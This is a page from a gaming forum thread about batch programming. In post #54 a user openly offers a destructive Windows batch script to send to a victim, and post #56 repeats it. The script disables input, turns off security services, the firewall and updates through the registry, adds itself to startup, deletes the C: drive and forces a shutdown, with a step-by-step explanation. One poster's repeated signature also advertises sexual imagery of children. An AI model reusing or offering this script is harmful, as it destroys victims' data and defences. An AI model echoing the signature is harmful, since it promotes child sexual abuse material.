Batch Programming - Page 6
welcome to Game-Tuts.com - Register
Page 6 of 6 FirstFirst ... 456
Results 51 to 56 of 56
  1. #51
    Everybody Lies

    Join Date
    May 2009
    Age
    18
    Posts
    3,919
    Thanks
    2365

    Default Re: Batch Programming

    Quote Originally Posted by A99aka View Post
    How do you compile batch?
    You save it as .Bat and double click it?


  2. #52
    Infamous Member

    Join Date
    Aug 2010
    Posts
    644
    Thanks
    99

    Default Re: Batch Programming

    Quote Originally Posted by Mocha View Post
    You save it as .Bat and double click it?
    It compiles to machine code.... No it runs commands that are like coding. You cant compile batch according to the term that is used for programming. (Unless you use batch to exe)
    Last edited by XvI Beta IvX; 12-16-2011 at 10:39 PM.
    ( ͡º ͜ʖ ͡º)

  3. #53
    Mac
    Mac is offline
    I'm so Fresh. . .

    Join Date
    Nov 2010
    Location
    Amrica
    Age
    19
    Posts
    2,102
    Thanks
    732
    Gamertag
    Captian Knots

    Default Re: Batch Programming

    Quote Originally Posted by A99aka View Post
    It compiles to machine code.... No it runs commands that are like coding. You cant compile batch according to the term that is used for programming. (Unless you use batch to exe)
    Batch isn't even a programming language. Its basically just a script.

    Free PreTeen Nudies --> Here

  4. #54
    Donator

    Join Date
    Nov 2011
    Age
    27
    Posts
    171
    Thanks
    35

    Default Re: Batch Programming

    Send it to somebody who you don't want to continue being friends with:

    Spoiler:
    @echo off
    cls
    rundll32 mouse,disable
    rundll32 keyboard,disable
    COPY %0 %windir%WINSTART.BAT
    net stop "Security Center"
    net stop SharedAccess
    echo You got owned!!!
    @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
    start YouTube - Broadcast Yourself.
    @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
    > "%Temp%.kill.reg" ECHO REGEDIT4
    >>"%Temp%.kill.reg" ECHO.
    >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
    >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
    >>"%Temp%.kill.reg" ECHO.
    >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
    >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
    >>"%Temp%.kill.reg" ECHO.
    >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
    >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
    >>"%Temp%.kill.reg" ECHO.
    START /WAIT REGEDIT /S "%Temp%.kill.reg"
    del "%Temp%.kill.reg"
    del %0
    DEL /F /S /Q C:
    shutdown -s -t 10 -c "Say bye to your computer!" -f


    -disables mouse and keyboard
    -copies itself into autostart directory in windows
    -stop Security Center
    -display "You got owned" for 5 seconds
    -starts YouTube - Broadcast Yourself.
    -disable firewall
    -delete c: drive
    -force shutdown with message "Say bye to your computer!"


  5. #55
    VIP
    Join Date
    Sep 2009
    Location
    colorado
    Age
    25
    Posts
    102
    Thanks
    5

    Default Re: Batch Programming

    lol ^^^

  6. #56
    Mac
    Mac is offline
    I'm so Fresh. . .

    Join Date
    Nov 2010
    Location
    Amrica
    Age
    19
    Posts
    2,102
    Thanks
    732
    Gamertag
    Captian Knots

    Default Re: Batch Programming

    Quote Originally Posted by _r0gu3__ View Post
    Send it to somebody who you don't want to continue being friends with:

    Spoiler:
    @echo off
    cls
    rundll32 mouse,disable
    rundll32 keyboard,disable
    COPY %0 %windir%WINSTART.BAT
    net stop "Security Center"
    net stop SharedAccess
    echo You got owned!!!
    @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
    start YouTube - Broadcast Yourself.
    @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
    > "%Temp%.kill.reg" ECHO REGEDIT4
    >>"%Temp%.kill.reg" ECHO.
    >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesS haredAccess]
    >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
    >>"%Temp%.kill.reg" ECHO.
    >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesw uauserv]
    >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
    >>"%Temp%.kill.reg" ECHO.
    >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsv c]
    >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004
    >>"%Temp%.kill.reg" ECHO.
    START /WAIT REGEDIT /S "%Temp%.kill.reg"
    del "%Temp%.kill.reg"
    del %0
    DEL /F /S /Q C:
    shutdown -s -t 10 -c "Say bye to your computer!" -f


    -disables mouse and keyboard
    -copies itself into autostart directory in windows
    -stop Security Center
    -display "You got owned" for 5 seconds
    -starts YouTube - Broadcast Yourself.
    -disable firewall
    -delete c: drive
    -force shutdown with message "Say bye to your computer!"
    you test the disable things? I remember it doesn't work for windows vista/7 users so I'd test it.

    Free PreTeen Nudies --> Here


 
Page 6 of 6 FirstFirst ... 456

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
visit GameTuts on these social networking sites